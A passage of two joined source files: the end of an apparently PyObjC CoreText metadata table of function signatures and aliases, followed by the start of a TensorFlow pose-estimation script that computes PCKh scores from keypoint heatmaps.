(sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTRun=}^{CGContext=}{_CFRange=ll}', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTRun=}^{CGContext=}{_CFRange=qq}'),), 'CTFontManagerIsSupportedFont': (b'B^{__CFURL=}',), 'CTRunGetAdvancesPtr': (sel32or64(b'^{CGSize=ff}^{__CTRun=}', b'^{CGSize=dd}^{__CTRun=}'), '', {'retval': {'c_array_of_variable_length': True}}), 'CTRunGetStatus': (b'I^{__CTRun=}',), 'CTGlyphInfoGetCharacterIdentifier': (b'S^{__CTGlyphInfo=}',), 'CTFontGetUnitsPerEm': (b'I^{__CTFont=}',), 'CTFontCopyVariation': (b'^{__CFDictionary=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFrameGetFrameAttributes': (b'^{__CFDictionary=}^{__CTFrame=}',), 'CTFramesetterCreateWithTypesetter': (b'@@', '', {'retval': {'already_cfretained': True}}), 'CTTextTabCreate': (b'^{__CTTextTab=}Cd^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCollectionSetExclusionDescriptors': (b'v^{__CTFontCollection=}^{__CFArray=}',), 'CTFrameGetPath': (b'^{CGPath=}^{__CTFrame=}',), 'CTFontManagerCopyRegisteredFontDescriptors': (b'^{__CFArray=}IB', '', {'retval': {'already_cfretained': True}}), 'CTFrameGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFramesetterGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontCollectionCreateFromAvailableFonts': (b'^{__CTFontCollection=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTRunGetGlyphsPtr': (b'r^S^{__CTRun=}', '', {'retval': {'c_array_of_variable_length': True}}), 'CTFontDrawGlyphs': (sel32or64(b'v^{__CTFont=}^S^{CGPoint=ff}L^{CGContext=}', b'v^{__CTFont=}^S^{CGPoint=dd}Q^{CGContext=}'), '', {'arguments': {1: {'c_array_length_in_arg': 3, 'type_modifier': 'n'}, 2: {'c_array_length_in_arg': 3, 'type_modifier': 'n'}}}), 'CTFontGetGlyphCount': (sel32or64(b'l^{__CTFont=}', b'q^{__CTFont=}'),), 'CTFontManagerCreateFontDescriptorFromData': (b'^{__CTFontDescriptor=}^{__CFData=}', '', {'retval': {'already_cfretained': True}}), 'CTGlyphInfoGetCharacterCollection': (b'S^{__CTGlyphInfo=}',), 'CTFontCopyAttribute': (b'@^{__CTFont=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetBoundingRectsForGlyphs': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTFont=}I^S^{_NSRect={_NSPoint=ff}{_NSSize=ff}}l', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTFont=}I^S^{CGRect={CGPoint=dd}{CGSize=dd}}q'), '', {'arguments': {2: {'c_array_length_in_arg': 4, 'type_modifier': 'n'}, 3: {'c_array_length_in_arg': 4, 'type_modifier': 'o'}}}), 'CTFontGetBoundingBox': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTFont=}', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTFont=}'),), 'CTFontManagerSetAutoActivationSetting': (b'v^{__CFString=}I',), 'CTTypesetterCreateWithAttributedStringAndOptions': (b'^{__CTTypesetter=}^{__CFAttributedString=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTLineGetImageBounds': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTLine=}^{CGContext=}', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTLine=}^{CGContext=}'),), 'CTFontCopyDisplayName': (b'^{__CFString=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTGetCoreTextVersion': (b'I',), 'CTParagraphStyleCreateCopy': (b'^{__CTParagraphStyle=}^{__CTParagraphStyle=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetAdvancesForGlyphs': (sel32or64(b'd^{__CTFont=}I^S^{_NSSize=ff}l', b'd^{__CTFont=}I^S^{CGSize=dd}q'), '', {'arguments': {2: {'c_array_length_in_arg': 4, 'type_modifier': 'n'}, 3: {'c_array_length_in_arg': 4, 'type_modifier': 'o'}}}), 'CTTextTabGetOptions': (b'^{__CFDictionary=}^{__CTTextTab=}',), 'CTGlyphInfoCreateWithGlyph': (b'^{__CTGlyphInfo=}S^{__CTFont=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCreateWithPlatformFont': (sel32or64(b'^{__CTFont=}Lf^{CGAffineTransform=ffffff}^{__CTFontDescriptor=}', b'^{__CTFont=}Id^{CGAffineTransform=dddddd}^{__CTFontDescriptor=}'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTFontCreateForStringWithLanguage': (b'^{__CTFont=}^{__CTFont=}^{__CFString=}{_CFRange=qq}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontManagerUnregisterGraphicsFont': (b'B^{CGFont=}^^{__CFError=}', '', {'arguments': {1: {'already_cfretained': True, 'type_modifier': 'o', 'null_accepted': True}}}), 'CTRubyAnnotationCreateCopy': (b'^{__CTRubyAnnotation=}^{__CTRubyAnnotation=}', '', {'retval': {'already_cfretained': True}}), 'CTTypesetterSuggestClusterBreakWithOffset': (sel32or64(b'l^{__CTTypesetter=}ldd', b'q^{__CTTypesetter=}qdd'),), 'CTRunGetTypeID': (sel32or64(b'L', b'Q'),), 'CTRubyAnnotationGetTextForPosition': (b'^{__CFString=}^{__CTRubyAnnotation=}C',), 'CTLineGetTypographicBounds': (sel32or64(b'd^{__CTLine=}^f^f^f', b'd^{__CTLine=}^d^d^d'), '', {'arguments': {1: {'type_modifier': 'o'}, 2: {'type_modifier': 'o'}, 3: {'type_modifier': 'o'}}}), 'CTFontGetPlatformFont': (sel32or64(b'L^{__CTFont=}^^{__CTFontDescriptor}', b'I^{__CTFont=}^^{__CTFontDescriptor}'), '', {'arguments': {1: {'already_cfretained': True, 'type_modifier': 'o'}}}), 'CTLineGetTrailingWhitespaceWidth': (b'd^{__CTLine=}',), 'CTFontManagerRegisterFontsForURL': (b'B^{__CFURL=}I^^{__CFError=}', '', {'arguments': {2: {'already_cfretained': True, 'type_modifier': 'o', 'null_accepted': True}}}), 'CTFontCopyTable': (sel32or64(b'^{__CFData=}^{__CTFont=}LI', b'^{__CFData=}^{__CTFont=}II'), '', {'retval': {'already_cfretained': True}}), 'CTTypesetterSuggestLineBreakWithOffset': (sel32or64(b'l^{__CTTypesetter=}ldd', b'q^{__CTTypesetter=}qdd'),), 'CTGlyphInfoCreateWithCharacterIdentifier': (b'^{__CTGlyphInfo=}SS^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyCharacterSet': (b'^{__CFCharacterSet=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetStringEncoding': (sel32or64(b'L^{__CTFont=}', b'I^{__CTFont=}'),), 'CTRunGetStringIndices': (sel32or64(b'v^{__CTRun=}{_CFRange=ll}^l', b'v^{__CTRun=}{_CFRange=qq}^q'), '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTRunGetAdvances': (sel32or64(b'v^{__CTRun=}{_CFRange=ll}^{_NSSize=ff}', b'v^{__CTRun=}{_CFRange=qq}^{CGSize=dd}'), '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTFontCollectionCreateMatchingFontDescriptorsSortedWithCallback': (b'^{__CFArray=}^{__CTFontCollection=}^?@', '', {'retval': {'already_cfretained': True}, 'arguments': {1: {'callable': {'retval': {'type': b'i'}, 'arguments': {0: {'type': b'^{__CTFontDescriptor=}'}, 1: {'type': b'^{__CTFontDescriptor=}'}, 2: {'type': b'@'}}}, 'callable_retained': False}}}), 'CTFontCopyFullName': (b'^{__CFString=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTParagraphStyleGetValueForSpecifier': (sel32or64(b'B^{__CTParagraphStyle=}IL^v', b'B^{__CTParagraphStyle=}IQ^v'), '', {'arguments': {3: {'c_array_length_in_arg': 2, 'type_modifier': 'o'}}}), 'CTLineGetOffsetForStringIndex': (sel32or64(b'f^{__CTLine=}l^f', b'd^{__CTLine=}q^d'), '', {'arguments': {2: {'type_modifier': 'o'}}}), 'CTFontManagerEnableFontDescriptors': (b'v^{__CFArray=}B',), 'CTRubyAnnotationGetAlignment': (b'C^{__CTRubyAnnotation=}',), 'CTFontCopyLocalizedName': (b'^{__CFString=}^{__CTFont=}^{__CFString=}^^{__CFString}', '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'o'}}}), 'CTFontDescriptorCreateCopyWithFamily': (b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontManagerGetScopeForURL': (b'I^{__CFURL=}',), 'CTFontGetSize': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFontCollectionGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontGetGlyphWithName': (b'S^{__CTFont=}^{__CFString=}',), 'CTLineGetGlyphRuns': (b'^{__CFArray=}^{__CTLine=}',), 'CTFontCreateWithNameAndOptions': (sel32or64(b'^{__CTFont=}^{__CFString=}f^{CGAffineTransform=ffffff}L', b'^{__CTFont=}^{__CFString=}d^{CGAffineTransform=dddddd}Q'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTFontDescriptorCreateCopyWithAttributes': (b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyFontDescriptor': (b'^{__CTFontDescriptor=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetCapHeight': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFontGetUnderlineThickness': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFontManagerCopyAvailableFontURLs': (b'^{__CFArray=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyFeatureSettings': (b'^{__CFArray=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorCreateMatchingFontDescriptor': (b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFSet=}', '', {'retval': {'already_cfretained': True}}), 'CTLineGetGlyphCount': (sel32or64(b'l^{__CTLine=}', b'q^{__CTLine=}'),), 'CTLineDraw': (b'v^{__CTLine=}^{CGContext=}',), 'CTFontDescriptorCreateCopyWithFeature': (b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFNumber=}^{__CFNumber=}', '', {'retval': {'already_cfretained': True}}), 'CTRubyAnnotationGetTypeID': (sel32or64(b'L', b'Q'),), 'CTTypesetterGetTypeID': (sel32or64(b'L', b'Q'),), 'CTRunGetTextMatrix': (sel32or64(b'{CGAffineTransform=ffffff}^{__CTRun=}', b'{CGAffineTransform=dddddd}^{__CTRun=}'),), 'CTFontGetLigatureCaretPositions': (sel32or64(b'l^{__CTFont=}S^fl', b'q^{__CTFont=}S^dq'), '', {'arguments': {2: {'c_array_length_in_arg': 3, 'type_modifier': 'o'}}}), 'CTFontCollectionCreateMutableCopy': (b'^{__CTFontCollection=}^{__CTFontCollection=}', '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorCreateWithNameAndSize': (sel32or64(b'^{__CTFontDescriptor=}^{__CFString=}f', b'^{__CTFontDescriptor=}^{__CFString=}d'), '', {'retval': {'already_cfretained': True}}), 'CTLineGetStringRange': (sel32or64(b'{_CFRange=ll}^{__CTLine=}', b'{_CFRange=qq}^{__CTLine=}'),), 'CTFontManagerCopyAvailablePostScriptNames': (b'^{__CFArray=}', '', {'retval': {'already_cfretained': True}}), 'CTRunDelegateGetRefCon': (b'^v^{__CTRunDelegate=}',), 'CTLineCreateJustifiedLine': (sel32or64(b'^{__CTLine=}^{__CTLine=}fd', b'^{__CTLine=}^{__CTLine=}dd'), '', {'retval': {'already_cfretained': True}}), 'CTFrameGetLines': (b'^{__CFArray=}^{__CTFrame=}',), 'CTFontCollectionCreateCopyWithFontDescriptors': (b'^{__CTFontCollection=}^{__CTFontCollection=}^{__CFArray=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTRunGetGlyphCount': (sel32or64(b'l^{__CTRun=}', b'q^{__CTRun=}'),), 'CTFontDescriptorCreateMatchingFontDescriptors': (b'^{__CFArray=}^{__CTFontDescriptor=}^{__CFSet=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCollectionSetQueryDescriptors': (b'v^{__CTFontCollection=}^{__CFArray=}',), 'CTFontDescriptorCopyLocalizedAttribute': (b'@^{__CTFontDescriptor=}^{__CFString=}^^{__CFString}', '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'o'}}}), 'CTFrameGetStringRange': (sel32or64(b'{_CFRange=ll}^{__CTFrame=}', b'{_CFRange=qq}^{__CTFrame=}'),), 'CTFrameGetLineOrigins': (sel32or64(b'v^{__CTFrame=}{_CFRange=ll}^{_NSPoint=ff}', b'v^{__CTFrame=}{_CFRange=qq}^{CGPoint=dd}'), '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTFontCreateWithName': (sel32or64(b'^{__CTFont=}^{__CFString=}f^{CGAffineTransform=ffffff}', b'^{__CTFont=}^{__CFString=}d^{CGAffineTransform=dddddd}'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTFramesetterGetTypesetter': (b'^{__CTTypesetter=}^{__CTFramesetter=}',), 'CTGlyphInfoCreateWithGlyphName': (b'^{__CTGlyphInfo=}^{__CFString=}^{__CTFont=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorCreateCopyWithSymbolicTraits': (b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}II', '', {'retval': {'already_cfretained': True}}), 'CTLineGetBoundsWithOptions': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTLine=}L', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTLine=}Q'),), 'CTFontCopyGraphicsFont': (b'^{CGFont=}^{__CTFont=}^^{__CTFontDescriptor}', '', {'retval': {'already_cfretained': True}, 'arguments': {1: {'already_cfretained': True, 'type_modifier': 'o'}}}), 'CTFontCollectionCreateMatchingFontDescriptorsForFamily': (b'^{__CFArray=}^{__CTFontCollection=}^{__CFString=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetXHeight': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTRunGetPositions': (sel32or64(b'v^{__CTRun=}{_CFRange=ll}^{_NSPoint=ff}', b'v^{__CTRun=}{_CFRange=qq}^{CGPoint=dd}'), '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTFontDescriptorCreateCopyWithVariation': (sel32or64(b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFNumber=}f', b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFNumber=}d'), '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorCreateWithAttributes': (b'^{__CTFontDescriptor=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontCollectionCreateMatchingFontDescriptors': (b'^{__CFArray=}^{__CTFontCollection=}', '', {'retval': {'already_cfretained': True}}), 'CTTextTabGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontManagerUnregisterFontsForURLs': (b'B^{__CFArray=}I^^{__CFArray=}', '', {'arguments': {2: {'type_modifier': 'o'}}}), 'CTFontCreateCopyWithSymbolicTraits': (sel32or64(b'^{__CTFont=}^{__CTFont=}f^{CGAffineTransform=ffffff}II', b'^{__CTFont=}^{__CTFont=}d^{CGAffineTransform=dddddd}II'), '', {'retval': {'already_cfretained': True}}), 'CTFontCopyTraits': (b'^{__CFDictionary=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTRunDraw': (sel32or64(b'v^{__CTRun=}^{CGContext=}{_CFRange=ll}', b'v^{__CTRun=}^{CGContext=}{_CFRange=qq}'),), 'CTLineGetStringIndexForPosition': (sel32or64(b'l^{__CTLine=}{CGPoint=ff}', b'q^{__CTLine=}{CGPoint=dd}'),), 'CTFontDescriptorCopyAttributes': (b'^{__CFDictionary=}^{__CTFontDescriptor=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetLeading': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTRunGetGlyphs': (sel32or64(b'v^{__CTRun=}{_CFRange=ll}^S', b'v^{__CTRun=}{_CFRange=qq}^S'), '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTFontCollectionCreateWithFontDescriptors': (b'^{__CTFontCollection=}^{__CFArray=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTRunDelegateCreate': (sel32or64(b'^{__CTRunDelegate=}^{_CTRunDelegateCallbacks=l^?^?^?^?}^v', b'^{__CTRunDelegate=}^{_CTRunDelegateCallbacks=q^?^?^?^?}^v'), '', {'retval': {'already_cfretained': True}}), 'CTTypesetterCreateLineWithOffset': (sel32or64(b'^{__CTLine=}^{__CTTypesetter=}{_CFRange=ll}d', b'^{__CTLine=}^{__CTTypesetter=}{_CFRange=qq}d'), '', {'retval': {'already_cfretained': True}}), 'CTFontGetUnderlinePosition': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTRunGetTypographicBounds': (sel32or64(b'd^{__CTRun=}{_CFRange=ll}^f^f^f', b'd^{__CTRun=}{_CFRange=qq}^d^d^d'), '', {'arguments': {2: {'type_modifier': 'o'}, 3: {'type_modifier': 'o'}, 4: {'type_modifier': 'o'}}}), 'CTTypesetterCreateWithAttributedString': (b'^{__CTTypesetter=}^{__CFAttributedString=}', '', {'retval': {'already_cfretained': True}}), 'CTLineCreateWithAttributedString': (b'^{__CTLine=}^{__CFAttributedString=}', '', {'retval': {'already_cfretained': True}}), 'CTTextTabGetAlignment': (b'C^{__CTTextTab=}',), 'CTFontCopyName': (b'^{__CFString=}^{__CTFont=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetSlantAngle': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFramesetterSuggestFrameSizeWithConstraints': (sel32or64(b'{CGSize=ff}^{__CTTypesetter=}{_CFRange=ll}@{CGSize=ff}^{_CFRange=ll}', b'{CGSize=dd}^{__CTTypesetter=}{_CFRange=qq}@{CGSize=dd}^{_CFRange=qq}'), '', {'arguments': {4: {'type_modifier': 'o'}}}), 'CTFontCollectionCopyFontAttributes': (b'^{__CFArray=}^{__CTFontCollection=}^{__CFSet=}I', '', {'retval': {'already_cfretained': True}}), 'CTFontManagerRegisterFontsForURLs': (b'B^{__CFArray=}I^^{__CFArray=}', '', {'arguments': {2: {'type_modifier': 'o'}}}), 'CTRubyAnnotationGetOverhang': (b'C^{__CTRubyAnnotation=}',), 'CTFontCopyFeatures': (b'^{__CFArray=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCreateForString': (sel32or64(b'^{__CTFont=}^{__CTFont=}^{__CFString=}{_CFRange=ll}', b'^{__CTFont=}^{__CTFont=}^{__CFString=}{_CFRange=qq}'), '', {'retval': {'already_cfretained': True}}), 'CTGlyphInfoGetGlyphName': (b'^{__CFString=}^{__CTGlyphInfo=}',), 'CTParagraphStyleGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontCreateUIFontForLanguage': (sel32or64(b'^{__CTFont=}If^{__CFString=}', b'^{__CTFont=}Id^{__CFString=}'), '', {'retval': {'already_cfretained': True}}), 'CTFontManagerCopyAvailableFontFamilyNames': (b'^{__CFArray=}', '', {'retval': {'already_cfretained': True}}), 'CTFrameGetVisibleStringRange': (sel32or64(b'{_CFRange=ll}^{__CTFrame=}', b'{_CFRange=qq}^{__CTFrame=}'),), 'CTFontManagerRegisterFontsWithAssetNames': (b'v^{__CFArray=}^{__CFBundle=}IB@?', '', {'arguments': {4: {'block': {'retval': {'type': b'B'}, 'arguments': {0: {'type': b'^{__CFArray=}'}, 1: {'type': b'B'}}}}}}), 'CTLineGetTypeID': (sel32or64(b'L', b'Q'),), 'CTRunGetPositionsPtr': (sel32or64(b'r^{_NSPoint=ff}^{__CTRun=}', b'r^{CGPoint=dd}^{__CTRun=}'), '', {'retval': {'c_array_of_variable_length': True}})} aliases = {'kCTFontItalicTrait': 'kCTFontTraitItalic', 'kCTFontMessageFontType': 'kCTFontUIFontMessage', 'kCTNaturalTextAlignment': 'kCTTextAlignmentNatural', 'kCTFontDefaultOrientation': 'kCTFontOrientationDefault', 'kCTFontVerticalTrait': 'kCTFontTraitVertical', 'kFontChineseScript': 'kFontTraditionalChineseScript', 'kCTFontToolbarFontType': 'kCTFontUIFontToolbar', 'kCTFontClarendonSerifsClass': 'kCTFontClassClarendonSerifs', 'kCTFontCondensedTrait': 'kCTFontTraitCondensed', 'kCTIdentityMappingCharacterCollection': 'kCTCharacterCollectionIdentityMapping', 'kFontEthiopicScript': 'kFontGeezScript', 'kCTFontEmphasizedSystemFontType': 'kCTFontUIFontEmphasizedSystem', 'kCTFontSlabSerifsClass': 'kCTFontClassSlabSerifs', 'CT_AVAILABLE_BUT_DEPRECATED': '__OSX_AVAILABLE_BUT_DEPRECATED', 'CT_AVAILABLE_STARTING': '__OSX_AVAILABLE_STARTING', 'kCTFontVerticalOrientation': 'kCTFontOrientationVertical', 'kCTFontEmphasizedSystemDetailFontType': 'kCTFontUIFontEmphasizedSystemDetail', 'kCTFontWindowTitleFontType': 'kCTFontUIFontWindowTitle', 'kCTFontOldStyleSerifsClass': 'kCTFontClassOldStyleSerifs', 'kCTFontExpandedTrait': 'kCTFontTraitExpanded', 'kCTAdobeGB1CharacterCollection': 'kCTCharacterCollectionAdobeGB1', 'kCTFontUtilityWindowTitleFontType': 'kCTFontUIFontUtilityWindowTitle', 'kCTFontColorGlyphsTrait': 'kCTFontTraitColorGlyphs', 'kCTFontUserFontType': 'kCTFontUIFontUser', 'kCTFontModernSerifsClass': 'kCTFontClassModernSerifs', 'kCTFontMiniEmphasizedSystemFontType': 'kCTFontUIFontMiniEmphasizedSystem', 'kCTFontApplicationFontType': 'kCTFontUIFontApplication', 'CT_DEPRECATED_ENUMERATOR': '__CT_DEPRECATED_ENUMERATOR', 'kCTFontScriptsClass': 'kCTFontClassScripts', 'kCTFontFreeformSerifsClass': 'kCTFontClassFreeformSerifs', 'kCTFontMiniSystemFontType': 'kCTFontUIFontMiniSystem', 'kCTFontSystemDetailFontType': 'kCTFontUIFontSystemDetail', 'kCTFontManagerScopeUser': 'kCTFontManagerScopePersistent', 'kCTFontMenuItemMarkFontType': 'kCTFontUIFontMenuItemMark', 'kFontSindhiScript': 'kFontExtendedArabicScript', 'kCTRunDelegateCurrentVersion': 'kCTRunDelegateVersion1', 'kCTFontOrnamentalsClass': 'kCTFontClassOrnamentals', 'kCTFontPaletteFontType': 'kCTFontUIFontPalette', 'kCTFontControlContentFontType': 'kCTFontUIFontControlContent', 'kCTFontMenuTitleFontType': 'kCTFontUIFontMenuTitle', 'kFontRussian': 'kFontCyrillicScript', 'kCTFontToolTipFontType': 'kCTFontUIFontToolTip', 'kCTFontTransitionalSerifsClass': 'kCTFontClassTransitionalSerifs', 'kCTFontLabelFontType': 'kCTFontUIFontLabel', 'kCTLeftTextAlignment': 'kCTTextAlignmentLeft', 'kCTAdobeKorea1CharacterCollection': 'kCTCharacterCollectionAdobeKorea1', 'kCTFontNoFontType': 'kCTFontUIFontNone', 'kCTFontUserFixedPitchFontType': 'kCTFontUIFontUserFixedPitch', 'kCTCenterTextAlignment': 'kCTTextAlignmentCenter', 'kCTAdobeJapan2CharacterCollection': 'kCTCharacterCollectionAdobeJapan2', 'kCTFontSmallSystemFontType': 'kCTFontUIFontSmallSystem', 'kCTFontMonoSpaceTrait': 'kCTFontTraitMonoSpace', 'kFontLatvianLanguage': 'kFontLettishLanguage', 'kCTFontSansSerifClass': 'kCTFontClassSansSerif', 'kCTJustifiedTextAlignment': 'kCTTextAlignmentJustified', 'kFontPersianLanguage': 'kFontFarsiLanguage', 'kCTFontAlertHeaderFontType': 'kCTFontUIFontAlertHeader', 'kCTFontBoldTrait': 'kCTFontTraitBold', 'kFontLappishLanguage': 'kFontSaamiskLanguage', 'kCTFontSmallEmphasizedSystemFontType': 'kCTFontUIFontSmallEmphasizedSystem', 'kCTFontSymbolicClass': 'kCTFontClassSymbolic', 'kCTFontMenuItemCmdKeyFontType': 'kCTFontUIFontMenuItemCmdKey', 'kCTAdobeCNS1CharacterCollection': 'kCTCharacterCollectionAdobeCNS1', 'kCTFontCompositeTrait': 'kCTFontTraitComposite', 'kCTFontUnknownClass': 'kCTFontClassUnknown', 'kCTFontUIOptimizedTrait': 'kCTFontTraitUIOptimized', 'kCTFontClassMaskTrait': 'kCTFontTraitClassMask', 'kCTFontMenuItemFontType': 'kCTFontUIFontMenuItem', 'kCTAdobeJapan1CharacterCollection': 'kCTCharacterCollectionAdobeJapan1', 'kCTFontPushButtonFontType': 'kCTFontUIFontPushButton', 'kCTFontSystemFontType': 'kCTFontUIFontSystem', 'kFontEastEuropeanRomanScript': 'kFontSlavicScript', 'kCTFontSmallToolbarFontType': 'kCTFontUIFontSmallToolbar', 'kCTFontHorizontalOrientation': 'kCTFontOrientationHorizontal', 'kFontOromoLanguage': 'kFontGallaLanguage', 'kCTRightTextAlignment': 'kCTTextAlignmentRight', 'kFontAmharicScript': 'kFontGeezScript', 'kCTFontViewsFontType': 'kCTFontUIFontViews'} cftypes=[('CTFontCollectionRef', b'^{__CTFontCollection=}', 'CTFontCollectionGetTypeID', 'NSCTFontCollection'), ('CTFontDescriptorRef', b'^{__CTFontDescriptor=}', 'CTFontDescriptorGetTypeID', 'NSCTFontDescriptor'), ('CTFontRef', b'^{__CTFont=}', 'CTFontGetTypeID', 'NSCTFont'), ('CTFrameRef', b'^{__CTFrame=}', 'CTFrameGetTypeID', None), ('CTFramesetterRef', b'^{__CTFramesetter=}', 'CTFramesetterGetTypeID', None), ('CTGlyphInfoRef', b'^{__CTGlyphInfo=}', 'CTGlyphInfoGetTypeID', 'NSCTGlyphInfo'), ('CTLineRef', b'^{__CTLine=}', 'CTLineGetTypeID', None), ('CTParagraphStyleRef', b'^{__CTParagraphStyle=}', 'CTParagraphStyleGetTypeID', None), ('CTRubyAnnotationRef', b'^{__CTRubyAnnotation=}', None, None), ('CTRunDelegateRef', b'^{__CTRunDelegate=}', 'CTRunDelegateGetTypeID', None), ('CTRunRef', b'^{__CTRun=}', 'CTRunGetTypeID', None), ('CTTextTabRef', b'^{__CTTextTab=}', 'CTTextTabGetTypeID', None), ('CTTypesetterRef', b'^{__CTTypesetter=}', 'CTTypesetterGetTypeID', None)] expressions = {} # END OF FILE
# Copyright 2019 Doyoung Gwak (tucan.dev@gmail.com) # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ====================== #-*- coding: utf-8 -*- import os import math # from scipy.ndimage.filters import gaussian_filter import tensorflow as tf tf.random.set_seed(3) import numpy as np def convert_heatmap_to_keypoint(heatmap, image_size): # heatmap = gaussian_filter(heatmap, sigma=5) idx = np.unravel_index(np.argmax(heatmap), heatmap.shape) x_idx = idx[1] / heatmap.shape[1] y_idx = idx[0] / heatmap.shape[0] return int(x_idx * image_size[1]), int(y_idx * image_size[0]) # exchange y, x sequence def convert_heatmaps_to_keypoints(heatmaps, image_size): kp_num = heatmaps.shape[-1] return [convert_heatmap_to_keypoint(heatmaps[:, :, kp_index], image_size) for kp_index in range(kp_num)] # head_index = 0 # neck_index = 1 # kp_sequences = [1, 2, 4, 6, 8, 3, 5, 7, 10, 12, 14, 9, 11, 13] # kp_sequences = [1, 2, 3, 4] # kp_sequences = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14] head_index = 0 # nose for coco neck_index = 4 # right ear for coco kp_sequences = list(range(1, 17+1)) # for coco def calculate_pckh(original_image_shape, keypoint_info, pred_heatmaps, distance_ratio=0.5): number_of_keypoints = pred_heatmaps.shape[-1] # pred heatmap -> coordinate pred_coords = convert_heatmaps_to_keypoints(pred_heatmaps, original_image_shape) # (x, y)s # gt coordinate gt_coords = np.array(keypoint_info["keypoints"]) gt_coords = np.reshape(gt_coords, (number_of_keypoints, 3)) # head coordinate kp0 = gt_coords[head_index, 0:2] # neck coordinate kp1 = gt_coords[neck_index, 0:2] threshold_dist = math.sqrt((kp0[0] - kp1[0]) ** 2 + (kp0[1] - kp1[1]) ** 2) threshold_dist *= distance_ratio scores = [] for kp_index in range(gt_coords.shape[-1]): pred_x, pred_y = pred_coords[kp_index] gt_x, gt_y, _ = gt_coords[kp_sequences[kp_index] - 1, :] d = math.sqrt((pred_x - gt_x) ** 2 + (pred_y - gt_y) ** 2) if d < threshold_dist: scores.append(1.0) # each_scores[kp_index].append(1.0) else: scores.append(0.0) # each_scores[kp_index].append(0.0) score = np.mean(scores) # print(f'img_id = {keypoint_info['image_id']}, threshold 